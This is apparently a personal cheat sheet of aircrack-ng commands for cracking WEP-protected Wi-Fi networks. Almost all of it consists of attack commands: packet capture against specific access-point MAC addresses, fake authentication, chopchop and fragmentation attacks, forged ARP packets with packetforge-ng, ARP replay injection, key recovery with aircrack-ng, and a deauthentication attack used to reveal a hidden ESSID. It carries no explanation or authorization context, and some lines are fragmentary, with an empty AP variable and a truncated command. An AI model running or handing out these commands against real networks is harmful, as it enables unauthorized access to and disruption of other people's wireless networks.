airodump-ng --encry wep mon0
(1-5-2)
airodump-ng --bssid 00:18:F3:7A:9E:07 -c 6 --ivs -w ted mon0
(1-3)
airodump-ng --bssid 00:18:F3:7A:9E:07 -c 6 -w ted mon0
---------------------------
export MAC=00:15:AF:C8:A6:60
export AP=
aireplay-ng -1 0 -a $AP -h $MAC mon0
aireplay-ng -1 6000 -o 1 -q 10 -e
(1-4-2)
aireplay-ng -4 -b $AP -h $MAC mon0
packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1121-044855.xor -w myarp
(1-5-2)
aireplay-ng -5 -b $AP -h $MAC mon0
packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-1105-104939.xor -w myarp
aireplay-ng -2 -r myarp -x 1024 mon0
(1-2)
aireplay-ng -2 -a $AP -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -t 1 -f 0 mon0
(1-3)
aireplay-ng -3 -b $AP -h $MAC -x 1024 mon0
---------------------------
(1-5-2)
aircrack-ng -n 64 ted-*.ivs
(1-3)
aircrack-ng -x -f 2 ted-01.cap
===========================================
Section 1: Singling out the AP you are cracking
aireplay-ng -9 -a 00:06:4F:64:35:D8 -h 00:15:AF:C8:A6:60 mon0
How to obtain a hidden ESSID: a legitimate client must be present, which is when attack number 0 is used.
aireplay-ng -0 10 -a <AP MAC> -c <legitimate client MAC> rausb0